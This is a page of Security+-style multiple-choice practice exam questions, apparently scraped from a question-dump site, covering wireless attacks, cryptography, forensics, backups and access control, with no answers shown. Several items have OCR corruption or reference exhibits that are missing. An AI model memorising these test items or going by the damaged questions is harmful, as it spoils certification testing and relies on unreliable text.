A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is being conducted?

Options:

A.

Evil twin

B.

Jamming

C.

DNS poisoning

D.

Bluesnarfing

E.

DDoS

Question 240

An enterprise needs to keep cryptographic keys in a safe manner. Which of the following network appliances can achieve this goal?

Options:

A.

HSM

B.

CASB

C.

TPM

D.

DLP

Question 241

Which of the following BEST describes a technique that compensates researchers for finding vulnerabilities?

Options:

A.

Penetration testing

B.

Code review

C.

Wardriving

D.

Bug bounty

Question 242

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Question 243

A client sent several inquiries to a project manager about the delinquent delivery status of some critical reports. The project manager claimed the reports were previously sent via email, but then quickly generated and backdated the reports before submitting them as plain text within the body of a new email message thread. Which of the following actions MOST likely supports an investigation for fraudulent submission?

Options:

A.

Establish chain of custody.

B.

Inspect the file metadata.

C.

Reference the data retention policy.

D.

Review the email event logs

Question 244

Which of the following authentication methods sends out a unique password to be used within a specific number of seconds?

Options:

A.

TOTP

B.

Biometrics

C.

Kerberos

D.

LDAP

Question 245

A company is implementing a new SIEM to log and send alerts whenever malicious activity is blocked by its antivirus and web content filters. Which of the following is the primary use case for this scenario?

Options:

A.

Implementation of preventive controls

B.

Implementation of detective controls

C.

Implementation of deterrent controls

D.

Implementation of corrective controls

Question 246

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to protect the PC from malicious files on the storage device?

Options:

A.

Change the default settings on the PC.

B.

Define the PC firewall rules to limit access.

C.

Encrypt the disk on the storage device.

D.

Plug the storage device in to the UPS

Question 247

one of the attendees starts to notice delays in the connection. and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

Options:

A.

Birthday collision on the certificate key

B.

DNS hacking to reroute traffic

C.

Brute force to the access point

D.

A SSL/TLS downgrade

Question 248

A company recently experienced an attack during which 5 main website was directed to the atack-er’s web server, allowing the attacker to harvest credentials from unsuspecting customers. Which of the following should the company Implement to prevent this type of attack from occurring in the future?

Options:

A.

IPSec

B.

SSL/TLS

C.

DNSSEC

D.

S/MIME

Question 249

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops The review yielded the following results.

• The exception process and policy have been correctly followed by the majority of users

• A small number of users did not create tickets for the requests but were granted access

• All access had been approved by supervisors.

• Valid requests for the access sporadically occurred across multiple departments.

• Access, in most cases, had not been removed when it was no longer needed

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

Options:

A.

Create an automated, monthly attestation process that removes access if an employee's supervisor denies the approval

B.

Remove access for all employees and only allow new access to be granted if the employee's supervisor approves the request

C.

Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team

D.

Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices

Question 250

An organization wants to enable built-in FDE on all laptops Which of the following should the organization ensure is Installed on all laptops?

Options:

A.

TPM

B.

CA

C.

SAML

D.

CRL

Question 251

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. which of the is following MOST likely reason for this type of assessment?

Options:

A.

An international expansion project is currently underway.

B.

Outside consultants utilize this tool to measure security maturity.

C.

The organization is expecting to process credit card information.

D.

A government regulator has requested this audit to be completed

Question 252

The spread of misinformation surrounding the outbreak of a novel virus on election day led to eligible voters choosing not to take the risk of going the polls. This is an example of:

Options:

A.

prepending.

B.

an influence campaign.

C.

a watering-hole attack.

D.

intimidation.

E.

information elicitation.

Question 253

An organization recently acquired an ISO 27001 certification. Which of the following would MOST likely be considered a benefit of this certification?

Options:

A.

It allows for the sharing of digital forensics data across organizations

B.

It provides insurance in case of a data breach

C.

It provides complimentary training and certification resources to IT security staff.

D.

It certifies the organization can work with foreign entities that require a security clearance

E.

It assures customers that the organization meets security standards

Question 254

A company wants to modify its current backup strategy to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy

Options:

A.

Incremental backups followed by differential backups

B.

Full backups followed by incremental backups

C.

Delta backups followed by differential backups

D.

Incremental backups followed by delta backups

E.

Full backup followed by different backups

Question 255

A security researcher is using an adversary's infrastructure and TTPs and creating a named group to track those targeted Which of the following is the researcher MOST likely using?

Options:

A.

The Cyber Kill Chain

B.

The incident response process

C.

The Diamond Model of Intrusion Analysis

D.

MITRE ATT&CK

Question 256

An organization wants seamless authentication to its applications. Which of the following should the organization employ to meet this requirement?

Options:

A.

SOAP

B.

SAML

C.

SSO

D.

Kerberos

Question 257

In which of the following scenarios is tokenization the best privacy technique to use?

Options:

A.

Providing pseudo-anonymization for social media user accounts

B.

Serving as a second factor for authentication requests

C.

Enabling established customers to safely store credit card information

D.

Masking personal information inside databases by segmenting data

Question 258

Which of the following is a hardware-specific vulnerability?

Options:

A.

Firmware version

B.

Buffer overflow

C.

SQL injection

D.

Cross-site scripting

Question 259

A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider. Which of the following is a risk in the new system?

Options:

A.

Default credentials

B.

Non-segmented network

C.

Supply chain vendor

D.

Vulnerable software

Question 260

A security analyst receives a SIEM alert that someone logged in to the app admin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

Which of the following can the security analyst conclude?

Options:

A.

A replay attack is being conducted against the application.

B.

An injection attack is being conducted against a user authentication system.

C.

A service account password may have been changed, resulting in continuous failed logins within the application.

D.

A credentialed vulnerability scanner attack is testing several CVEs against the application.

Question 261

Developers are writing code and merging it into shared repositories several times a day. where it is tested automatically. Which of the following concepts does this best represent?

Options:

A.

Functional testing

B.

Stored procedures

C.

Elasticity

D.

Continuous Integration

Question 262

A company's marketing department collects, modifies, and stores sensitive customer data. The infrastructure team is responsible for Securing the data while in transit and at rest. Which of the following data roles describes the customer?

Options:

A.

Processor

B.

Custodian

C.

Subject

D.

Owner

Question 263

At the start of a penetration test, the tester checks OSINT resources for information about the client environment. Which of the following types of reconnaissance is the tester performing?

Options:

A.

Active

B.

Passive

C.

Offensive

D.

Defensive

Question 264

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller

does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Question 265

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

Options:

A.

Segmentation

B.

Firewall allow list

C.

Containment

D.

Isolation

Question 266

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action?

Options:

A.

Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B.

Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C.

Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.

D.

Request the caller send an email for identity verification and provide the requested information via email to the caller.

Question 267

Which of the following incident response activities ensures evidence is properly handled?

Options:

A.

E-discovery

B.

Chain of custody

C.

Legal hold

D- Preservation

Question 268

A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions alone. Which of the following solutions best fits this use case?

Options:

A.

EDR

B.

DLP

C.

NGFW

D.

HIPS

Question 269

Which of the following considerations is the most important for an organization to evaluate as it establishes and maintains a data privacy program?

Options:

A.

Reporting structure for the data privacy officer

B.

Data subject access request process

C.

Role as controller and processor

D.

Physical location of the company

Question 270

A security engineer is implementing FDE for all laptops in an organization. Which of the following are the most important for the engineer to consider as part of the planning process? (Select two).

Options:

A.

Key escrow

B.

TPM presence

C.

Digital signatures

D.

Data tokenization

E.

Public key management

F.

Certificate authority linking

Question 271

Which of the following scenarios best describes a risk reduction technique?

Options:

A.

A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches

B.

A security control objective cannot be met through a technical change, so the company implements a pokey to train users on a more secure method of operation

C.

A security control objective cannot be met through a technical change, so the company performs regular audits to determine it violations have occurred

D.

A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Question 272

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company's servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

Options:

A.

Revoke the code signing certificate used by both programs.

B.

Block all unapproved file hashes from installation.

C.

Add the accounting application file hash to the allowed list.

D.

Update the code signing certificate for the approved application.

Question 273

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing?

Options:

A.

DLP

B.

VPC

C.

CASB

D.

Content filtering

Question 274

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Question 275

A security analyst is investigating a malware incident at a company The malware is accessing a command-and-control website at . All outbound internet traffic is logged to a syslog server and stored in /logfiles/messages Which of the following commands would be best for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?

Options:

A.

head -500 www. compt ia.com | grep /logfiles/messages

B.

cat /logfiles/messages I tail -500 www.comptia.com

C.

tail -500 /logfiles/messages I grep www.cornptia.com

D.

grep -500 /logfiles/messages I cat www.comptia.cctn

Question 276

A security analyst is reviewing the following command-line output:

Internet address Physical address Type

192.168.1.1 aa-bb-cc-00-11-22 dynamic

192.168. aa-bb-cc-00-11-22 dynamic

192.168.1.3 aa-bb-cc-00-11-22 dynamic

192.168.1.4 aa-bb-cc-00-11-22 dynamic

192.168.1.5 aa-bb-cc-00-11-22 dynamic

--output omitted---

192.168.1.251 aa-bb-cc-00-11-22 dynamic

192.168.1.252 aa-bb-cc-00-11-22 dynamic

192.168.1.253 aa-bb-cc-00-11-22 dynamic

192.168.1.254 aa-bb-cc-00-11-22 dynamic

192.168.1.255 ff-ff-ff-ff-ff-ff static

Which of the following is the analyst observing?

Options:

A.

ICMP spoofing

B.

URL redirection

C.

MAC address cloning

D.

DNS poisoning

Question 277

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would best meet this need?

Options:

A.

Community

B.

Private

C.

Public

D.

Hybrid

Question 278

Which of the following strengthens files stored in the /etc/shadow directory?

Options:

A.

Key agreement

B.

Digital signatures

C.

Salting

D.

Key stretching

Question 279

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a single firewall?

Options:

A.

Transit gateway

B.

Cloud hot site

C.

Edge computing

D.

DNS sinkhole

Question 280

An internet company has created a new collaboration application. To expand the user base, the company wants to implement an option that allows users to log in to the application with the

credentials of her popular websites. Which of the following should the company implement?

Options:

A.

SSO

B.

CHAP

C.

802.1X

D.

OpenlD

Question 281

A company is experiencing a web services outage on the public network. The services are up and available but inaccessible. The network logs show a sudden increase in network traffic that is causing the outage. Which of the following attacks is the organization experiencing?

Options:

A.

Logic bomb

B.

Brute-force

C.

Buffer overflow

D.

DDoS

Question 282

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Question 283

Which of the following is the most common data loss path for an air-gapped network?

Options:

A.

Bastion host

B.

Unsecured Bluetooth

C.

Unpatched OS

D.

Removable devices

Question 284

A sensitive piece of information in a production database is replaced with a non-sensitive value that, when compromised, provides no value to the offender. Which of the following describes this process?

Options:

A.

Tokenization

B.

Obfuscation

C.

Masking

D.

Hashing

Question 285

A financial analyst is expecting an email containing sensitive information from a client. When the email arrives, the analyst receives an error and is unable to open the encrypted message. Which of the following is the most likely cause of the issue?

Options:

A.

The S'MIME plug-m is not enabled.

B.

The SSL certificate has expired.

C.

Secure I MAP was not implemented.

D.

P0P3S is not supported.

Question 286

Which of the following should a security administrator adhere to when setting up a new set of firewall rules?

Options:

A.

Disaster recovery plan

B.

Incident response procedure

C.

Business continuity plan

D.

Change management procedure

Question 287

After reviewing the following vulnerability scanning report:

server:192.168.14.6

Service: Telnet Port: 23 Protocol: TCP Status: Open Severity: High

Vulnerability: Use of an insecure network protocol

A security analyst performs the following test

nmap -p 23 192.1€8.14. € --script telnet-encryption

PORT STATE SERVICE REASON

23/tcp open telnet syn-ack

I telnet encryption:

| Telnet server supports encryption

Which of the following would the security analyst conclude for this reported vulnerability7?

Options:

A.

It is a false positive.

B.

A rescan is required.

C.

It is considered noise.

D.

Compensating controls exist

Question 288

An attacker is attempting to harvest user credentials on a client's website. A security analyst notices multiple attempts of random usernames and passwords. When the analyst types in a random username and password, the logon screen displays the following message:

The username you entered does not exist.

Which of the following should the analyst recommend be enabled?

Options:

A.

Input validation

B.

Obfuscation

C.

Error handling

D.

Username lockout

Question 289

All security analysts' workstations at a company have network access to a critical server VLAN. The information security manager wants to further enhance the controls by requiring that all access to the secure VLAN be authorized only from a given single location. Which of the following will the information security manager most likely implement?

Options:

A.

A forward proxy server

B.

A jump server

C.

A reverse proxy server

D.

A stateful firewall server

Question 290

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Question 291

A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommended?

Options:

A.

A content filter

B.

AWAF

C.

A next-generation firewall

D.

An IDS

Question 292

The IT department's on-site developer has been with the team for many years. Each lime an application is released; the security team is able to identify multiple vulnerabilities Which of the Mowing would best help the team ensure the application is ready to be released to production?

Options:

A.

Limit the use of third-party libraries.

B.

Prevent data exposure queries.

C.

Obfuscate the source code

D.

Submit the application to OA before releasing it.

Question 293

The concept of connecting a user account across the systems of multiple enterprises is best known as:

Options:

A.

federation

B.

a remote access policy.

C.

multifactor authentication

D.

single sign-on.

Question 294

An incident analyst finds several image files on a hard disk. The image files may contain geolocation coordinates. Which of the following best describes the type of information the analyst is trying to extract from the image files?

Options:

A.

Log data

B.

Metadata

C.

Encrypted data

D.

Sensitive data

Question 295

A user's login credentials were recently compromised During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password However the trusted website does not use a pop-up for entering user colonials Which of the following attacks occurred?

Options:

A.

Cross-site scripting

B.

SOL injection

C.

DNS poisoning

D.

Certificate forgery

Question 296

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

Options:

A.

A non-disclosure agreement

B.

Least privilege

C.

An acceptable use policy

D.

Off boarding

Question 297

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works best until a proper fix is released?

Options:

A.

Detective

B.

Compensating

C.

Deterrent

D.

Corrective

Question 298

Which of the following test helps to demonstrate integrity during a forensics investigation?

Options:

A.

Event logs

B.

Encryption

C.

Hashing

D.

Snapshots

Question 299

Adding a value to the end of a password to create a different password hash is called:

Options:

A.

salting.

B.

key stretching.

C.

steganography.

D.

MD5 checksum.

Question 300

A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer data. Which of the following would provide the best proof that the hosting provider has met the requirements?

Options:

A.

NIST CSF

B.

SOC 2 Type 2 report

C.

CIS Top 20 compliance reports

D.

Vulnerability report

Question 301

A secondly administration is trying to determine whether a server is vulnerable to a range of attacks After using a tool, the administrator obtains the following output.

Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Question 302

An endpoint protection application contains critical elements that are used to protect a system from infection. Which of the following must be updated before completing a weekly endpoint check?

Options:

A.

Policy engine

B.

Policy updates

C.

Policy definitions

D.

Policy signatures

Question 303

Which of the following is an algorithm performed to verify that data has not been modified?

Options:

A.

Hash

B.

Code check

C.

Encryption

D.

Checksum

Question 304

Which of the following is a reason why a forensic specialist would create a plan to preserve data after an incident and prioritize the sequence for performing forensic analysis?

Options:

A.

Order of volatility

B.

Preservation of event logs

C.

Chain of custody

D.

Compliance with legal hold

Question 305

Which of the following is the correct order of volatility from most to least volatile?

Options:

A.

Memory, temporary filesystems. routing tables, disk, network storage

B.

Cache, memory, temporary filesystems. disk, archival media

C.

Memory, disk, temporary filesystems. cache, archival media

D.

Cache, disk, temporary filesystems. network storage, archival media

Question 306

A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many different types of hardware. Which of the following deployment models will provide the needed flexibility with the greatest amount of control and security over company data and infrastructure?

Options:

A.

BYOD

B.

JVDI

C.

COPE

D.

CYOD

Question 307

A company currently uses passwords for logging in to company-owned devices and wants to add a second authentication factor Per corporate policy, users are not allowed to have smartphones at their desks Which of the following would meet these requirements?

Options:

A.

Smart card

B.

PIN code

C.

Knowledge-based question

D.

Secret key

Question 308

A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.

Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.

Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet. Which of the following is the most likely reason for this compromise?

Options:

A.

A brute-force attack was used against the time-keeping website to scan for common passwords.

B.

A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.

C.

The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.

D.

ARP poisoning affected the machines in the building and caused the kiosks to send a copy of all the submitted credentials to a malicious machine.

Question 309

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data. Which of the following should the company consider?

Options:

A.

Geographic dispersion

B.

Platform diversity

C.

Hot site

D.

Load balancing

Question 310

Recent changes to a company's BYOD policy require all personal mobile devices to use a two-factor authentication method that is not something you know or have. Which of the following will meet this requirement?

Options:

A.

Facial recognition

B.

Six-digit PIN

C.

PKI certificate

D.

Smart card

Question 311

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

Options:

A.

Scanning

B.

Alerting

C.

Reporting

D.

Archiving

Question 312

A security administrator checks the security logs of a Linux server and sees a lot of the following lines:

Which of the following is most likely being attempted?

Options:

A.

SQL injection attack

B.

Rainbow table attack

C.

Rootkit attack

D.

Brute-force attack

Question 313

During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An

analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will best assist the analyst?

Options:

A.

A vulnerability scanner

B.

A NGFW

C.

The Windows Event Viewer

D.

A SIEM

Question 314

A company's web filter is configured to scan the URL for strings and deny access when matches are found. Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?

Options:

A.

encryption=off

B.

http://

C.

www.*.com

D.

:443

Question 315

During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address. Which of the following would have best prevented this avenue of attack?

Options:

A.

Enabling MAC address filtering

B.

Moving printers inside a firewall

C.

Implementing 802.IX

D.

Using network port security

Question 316

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the secure alternatives for replacing them? (Select THREE).

Options:

A.

SFTP, FTPS

B.

SNMPv2, SNMPv3

C.

HTTP, HTTPS

D.

TFTP, FTP

E.

SNMPW1, SNMPv2

F.

Telnet, SSH

G.

TLS, SSL

Question 317

Local guidelines require that all information systems meet a minimum security baseline to be compliant Which of the following can security administrators use to assess their system configurations against the baseline?

Options:

A.

SOAR playbook

B.

Security control matrix

C.

Risk management framework

D.

Benchmarks

Question 318

A security analyst is reviewing logs on a server and observes the following output:

01/01/2020 03:33:23 admin attempted login with password sneak

01/01/2020 03:33:32 admin attempted login with password sneaked

01/01/2020 03:33:41 admin attempted login with password sneaker

01/01/2020 03:33:50 admin attempted login with password sneer

01/01/2020 03:33:59 admin attempted login with password sneeze

01/01/2020 03:34:08 admin attempted login with password sneezy

Which of the following is the security analyst observing?

Options:

A.

A rainbow table attack

B.

A password-spraying attack

C.

A dictionary attack

D.

A keylogger attack

Page: 1 / 106
Total 1063 questions